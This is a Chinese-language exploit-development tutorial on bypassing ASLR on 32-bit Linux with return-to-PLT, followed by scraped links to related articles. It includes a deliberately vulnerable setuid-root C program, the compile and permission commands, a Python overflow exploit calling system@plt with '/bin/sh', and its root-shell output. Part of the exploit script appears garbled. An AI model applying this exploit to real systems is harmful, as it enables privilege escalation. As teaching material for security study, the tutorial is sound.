Linux (x86) Exploit 开发系列教程之六(绕过ASLR - 第一部分)
转:https://bbs.pediy.com/thread-217390.htm
前提条件:
经典的基于堆栈的缓冲区溢出
虚拟机安装:Ubuntu 12.04(x86)
在以前的帖子中,我们看到了攻击者需要知道下面两样事情
堆栈地址(跳转到shellcode)
libc基地址(成功绕过NX bit)
为了利用漏洞代码。 为了阻止攻击者的行为,安全研究人员提出了一个称为“ASLR”的漏洞利用。
什么是 ASLR?
地址空间布局随机化(ASLR)是随机化的利用缓解技术:
堆栈地址
堆地址
共享库地址
一旦上述地址被随机化,特别是当共享库地址被随机化时,我们采取的绕过NX bit的方法不会生效,因为攻击者需要知道libc基地址。但这种缓解技术并不完全是万无一失的,因此在这篇文章中我们可以看到如何绕过共享库地址随机化!
我们已经知道从前一篇文章的exp.py libc函数地址计算如下:
1
|
libc function address = libc base address + function offset |
其中
因为随机化被关闭,所以libc基址是常量(0xb7e22000 - 对于我们的“vuln”二进制文件)。
函数偏移也是不变的(从“readelf -s libc.so.6 | grep”获得)
现在当我们打开完全随机化(使用下面的命令)
1
|
#echo 2 > /proc/sys/kernel/randomize_va_space |
libc基地址将被随机化。
注意:只有libc基地址是随机的,特定功能的偏移与其基地址始终保持不变!因此,如果我们可以绕过共享库基地址随机化,即使打开ASLR,也可以成功利用易受攻击的程序(使用三种技术)。
Return-to-plt (这章)
Brute force (第二部分)
GOT overwrite and GOT dereference (第三部分)
什么是return-to-plt?
在这种技术中,而不是返回到libc函数(其地址是随机的)攻击者返回到一个函数的PLT(其地址不是随机的-其地址在执行之前已知)。由于'function@PLT'不是随机的,所以攻击者不再需要预测libc的基地址,而是可以简单地返回到“function@PLT”来调用“function”。
什么是PLT,如何通过调用“function@PLT”来调用“函数”?
要了解过程链接表(PLT),先让我简要介绍一下共享库!
与静态库不同,共享库代码段在多个进程之间共享,而其数据段对于每个进程是唯一的。这有助于减少内存和磁盘空间。由于代码段在多个进程之间共享,所以应该只有read和execute权限,因此动态链接器不能重新定位代码段中存在的数据符号或函数地址(因为它没有写权限)。那么动态链接如何在运行时重新定位共享库符号而不修改其代码段?它使用PIC完成!
什么是PIC?
位置无关代码(PIC)是为了解决这个问题而开发的 - 它确保共享库代码段在多个进程之间共享,尽管在加载时执行重定位。PIC通过一级间接寻址实现这一点-共享库代码段不包含绝对虚拟地址来代替全局符号和函数引用,而是指向数据段中的特定表。该表是全局符号和函数绝对虚拟地址的占位符。动态链接器作为重定位的一部分来填充此表。因此,只有重定位数据段被修改,代码段保持不变!
动态链接器以两种不同的方式重新定位PIC中发现的全局符号和函数,如下所述:
全局偏移表(GOT):
全局偏移表包含每个全局变量的4字节条目,其中4字节条目包含全局变量的地址。当代码段中的指令引用全局变量时,而不是全局变量的绝对虚拟地址,指令指向GOT中条目。当加载共享库时,GOT条目由动态链接器重新定位。因此,PIC使用该表来重新定位具有单个间接级别的全局符号。
过程链接表(PLT): 过程链接表包含每个全局函数的存根代码。代码段中的调用指令不直接调用函数('function'),而是调用存根代码(function @ PLT)。这个存根代码在动态链接器的帮助下解析了函数地址并将其复制到GOT(GOT [n])。这次解析仅在函数('function')的第一次调用期间发生,稍后当代码段中的调用指令调用存根代码(function @PLT)时,而不是调用动态链接器来解析函数地址('function')存根代码直接从GOT(GOT [n])获取功能地址并跳转到它。因此,PIC使用这个表来重新定位具有两级间接的功能地址。
很好,你阅读了关于PIC的内容,并了解了它有助于保持共享库代码段的完整,因此它有助于共享库代码段在许多进程之间真正的共享!但是你有没有想过,为什么当它不共享任何进程时,在可执行文件的代码段需要有一个GOT 条目或PLT存根代码?它的安全保护机制。现在默认情况下,代码段只能被赋予读取和执行权限,没有写入权限(R_X)。这种安全保护机制甚至不允许动态链接器写入代码段,因此它不能重新定位代码段中发现的数据符号或函数地址。因此,为了允许动态链接器重定位,可执行文件也需要GOT 条目和PLT存根代码,就像共享库一样!
实例:
1
2
3
4
5
6
7
|
//eg .c // $gcc -g -o eg eg.c #include <stdio.h> int main(int argc, char* argv[]) { printf ( "Hello %s\n" , argv[1]); return 0; } |
下面的反汇编显示,我们不会直接调用'printf',而是调用相应的PLT代码'printf@PLT'。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
(gdb) disassemble main Dump of assembler code for function main: 0x080483e4 <+0>: push %ebp 0x080483e5 <+1>: mov %esp,%ebp 0x080483e7 <+3>: and $0xfffffff0,%esp 0x080483ea <+6>: sub $0x10,%esp 0x080483ed <+9>: mov 0xc(%ebp),%eax 0x080483f0 <+12>: add $0x4,%eax 0x080483f3 <+15>: mov (%eax),%edx 0x080483f5 <+17>: mov $0x80484e0,%eax 0x080483fa <+22>: mov %edx,0x4(%esp) 0x080483fe <+26>: mov %eax,(%esp) 0x08048401 <+29>: call 0x8048300 < printf @plt> 0x08048406 <+34>: mov $0x0,%eax 0x0804840b <+39>: leave 0x0804840c <+40>: ret End of assembler dump. (gdb) disassemble 0x8048300 Dump of assembler code for function printf @plt: 0x08048300 <+0>: jmp *0x804a000 0x08048306 <+6>: push $0x0 0x0804830b <+11>: jmp 0x80482f0 End of assembler dump. (gdb) |
在printf第一次调用之前,其相应的GOT条目(0x804a000)指针将返回到PLT代码(0x8048306)。因此,当第一次调用printf函数时,其对应的函数地址将在动态链接器的帮助下得到解决。
1
2
3
|
(gdb) x /1xw 0x804a000 0x804a000 < printf @got.plt>: 0x08048306 (gdb) |
现在在printf的调用之后,其相应的GOT条目包含printf函数地址(如下所示):
1
2
3
|
(gdb) x /1xw 0x804a000 0x804a000 < printf @got.plt>: 0xb7e6e850 (gdb) |
注1:如果你想知道更多的PLT和GOT,请看这个博客的文章!
注2:在另一篇文章中,我将详细介绍如何在动态链接器的帮助下动态解析libc函数地址。到目前为止,只要记住下面两个语句(printf@PLT的一部分)负责函数地址解析!
1
2
|
0x08048306 <+6>: push $0x0 0x0804830b <+11>: jmp 0x80482f0 |
现在有了这些知识,我们知道攻击者不需要精确的libc函数地址来调用libc函数,可以使用'function@PLT'地址(在执行之前知道)来简单地调用它。
漏洞代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#include <stdio.h> #include <string.h> /* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */ void shell() { system( "/bin/sh" ); exit (0); } int main(int argc, char* argv[]) { int i=0; char buf[256]; strcpy(buf,argv[1]); printf ( "%s\n" ,buf); return 0; } |
编译命令:
1
2
3
4
5
|
#echo 2 > /proc/sys/kernel/randomize_va_space $gcc -g -fno-stack-protector -o vuln vuln.c $ sudo chown root vuln $ sudo chgrp root vuln $ sudo chmod +s vuln |
现在反汇编可执行文件'vuln',我们可以找到‘system@PLT’和 ‘exit@PLT’的地址。
1
2
3
4
5
6
7
8
9
10
11
|
(gdb) disassemble shell Dump of assembler code for function shell: 0x08048474 <+0>: push %ebp 0x08048475 <+1>: mov %esp,%ebp 0x08048477 <+3>: sub $0x18,%esp 0x0804847a <+6>: movl $0x80485a0,(%esp) 0x08048481 <+13>: call 0x8048380 <system@plt> 0x08048486 <+18>: movl $0x0,(%esp) 0x0804848d <+25>: call 0x80483a0 < exit @plt> End of assembler dump. (gdb) |
使用这些地址我们可以写一个绕过ASLR(和NX bit)的漏洞利用代码!
利用代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
#exp.py #!/usr/bin/env python import struct from subprocess import call system = 0x8048380 exit = 0x80483a0 system_arg = 0x80485b5 #Obtained from hexdump output of executable 'vuln' #endianess convertion def conv(num): return struct.pack("ystem + exit + system_arg buf = "A" * 272 buf += conv(system) buf += conv( exit ) buf += conv(system_arg) print "Calling vulnerable program" call([ "./vuln" , buf]) |
执行上面的exploit程序给我们root shell,如下所示:
1
2
3
4
5
6
7
|
$ python exp.py Calling vulnerable program AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA������ # id uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups =0(root),4(adm),24(cdrom),27( sudo ),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun) # exit $ |
注意:为了获得这个root shell,可执行文件应包含'system@PLT'和'exit@PLT'代码。在第三部分中,我将讨论GOT覆盖和GOT解引用技术,即使在可执行文件中不存在必需的PLT存根代码,并且当ASLR被打开时,也可以帮助攻击者调用libc函数。
Linux (x86) Exploit 开发系列教程之六(绕过ASLR - 第一部分)的更多相关文章
- Linux (x86) Exploit 开发系列教程之七 绕过 ASLR -- 第二部分
(1)原理: 使用爆破技巧,来绕过共享库地址随机化.爆破:攻击者选择特定的 Libc 基址,并持续攻击程序直到成功.这个技巧是用于绕过 ASLR 的最简单的技巧. (2)漏洞代码 //vuln.c # ...
- Linux (x86) Exploit 开发系列教程之四(使用return-to-libc绕过NX bit)
(1)原理: “NX Bit”的漏洞缓解:使某些内存区域不可执行,并使可执行区域不可写.示例:使数据,堆栈和堆段不可执行,而代码段不可写. 在NX bit打开的情况下,基于堆栈的缓冲区溢出的经典方法将 ...
- Linux (x86) Exploit 开发系列教程之二(整数溢出)
(1)漏洞代码 //vuln.c #include <stdio.h> #include <string.h> #include <stdlib.h> void s ...
- Linux (x86) Exploit 开发系列教程之三(Off-By-One 漏洞 (基于栈))
off by one(栈)? 将源字符串复制到目标缓冲区可能会导致off by one 1.源字符串长度等于目标缓冲区长度. 当源字符串长度等于目标缓冲区长度时,单个NULL字节将被复制到目标缓冲区上 ...
- Linux (x86) Exploit 开发系列教程之一(典型的基于堆栈的缓冲区溢出)
(1)漏洞代码 //vuln.c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) ...
- Linux Exploit系列之六 绕过ASLR - 第一部分
绕过ASLR - 第一部分 什么是 ASLR? 地址空间布局随机化(ASLR)是随机化的利用缓解技术: 堆栈地址 堆地址 共享库地址 一旦上述地址被随机化,特别是当共享库地址被随机化时,我们采取的绕过 ...
- HTML5游戏开发系列教程7(译)
原文地址:http://www.script-tutorials.com/html5-game-development-lesson-7/ 今天我们将完成我们第一个完整的游戏--打砖块.这次教程中,将 ...
- HTML5游戏开发系列教程6(译)
原文地址:http://www.script-tutorials.com/html5-game-development-lesson-6/ 这是我们最新一篇HTML5游戏开发系列文章.我们将继续使用c ...
- HTML5游戏开发系列教程5(译)
原文地址:http://www.script-tutorials.com/html5-game-development-lesson-5/ 最终我决定准备下一篇游戏开发系列的文章,我们将继续使用can ...
随机推荐
- 【Java】将字符串转化为整数
前几天面试遇到这个问题:在Java中如何将字符串转化为整数,当时too young too naive,随便回答了一下.今天跑去看Java源码中paresInt函数的写法,Oh my god!其实不看 ...
- [Luogu 1197] JSOI2008 星球大战
[Luogu 1197] JSOI2008 星球大战 我算是真的沦为联赛选手了. 并查集裸题. 比较麻烦的是删点. 但是从后往前加点就好操作很多. 所以考虑离线,先存图,然后没被删的点之间,有边就合并 ...
- Spring Boot 使用IntelliJ IDEA创建一个web开发实例(四)
多环境配置 1. 在springBoot多环境配置文件名需要满足application-{profile}.properties的格式,其中{profile}对应你的环境标识,例如: (1)appli ...
- (转)使用Excel批量给数据添加单引号和逗号
在使用PLSQL连接oracle数据库处理数据的过程中,常用的操作是通过ID查询出数据,ID需要附上单引号,如果查询的ID为一条或者几条,我们手动添加即可,但是如果是几百条.几千条的话,就需要使用一些 ...
- MongoDB - MongoDB CRUD Operations, Insert Documents
MongoDB provides the following methods for inserting documents into a collection: db.collection.inse ...
- 【leetcode 简单】第四十二题 阶乘后的零
给定一个整数 n,返回 n! 结果尾数中零的数量. 示例 1: 输入: 3 输出: 0 解释: 3! = 6, 尾数中没有零. 示例 2: 输入: 5 输出: 1 解释: 5! = 120, 尾数中有 ...
- C.Fountains(Playrix Codescapes Cup (Codeforces Round #413, rated, Div. 1 + Div. 2)+线段树+RMQ)
题目链接:http://codeforces.com/contest/799/problem/C 题目: 题意: 给你n种喷泉的价格和漂亮值,这n种喷泉题目指定用钻石或现金支付(分别用D和C表示),C ...
- 信息收集之zoomeye
一.浏览器上使用api接口 1.https://api.zoomeye.org/user/login post传参:{"username" : "username&quo ...
- BeanPostProcessor的五大接口
BeanPostProcessor 关于对象初始化前后的回调. public interface BeanPostProcessor { //该方法在bean实例化完毕(且已经注入完毕),在after ...
- python第三方库之numpy基础
前言 numpy是python的科学计算模块,底层实现用c代码,运算效率很高.numpy的核心是矩阵narray运算. narray介绍 矩阵拥有的属性 ndim属性:维度个数 shape属性:维度大 ...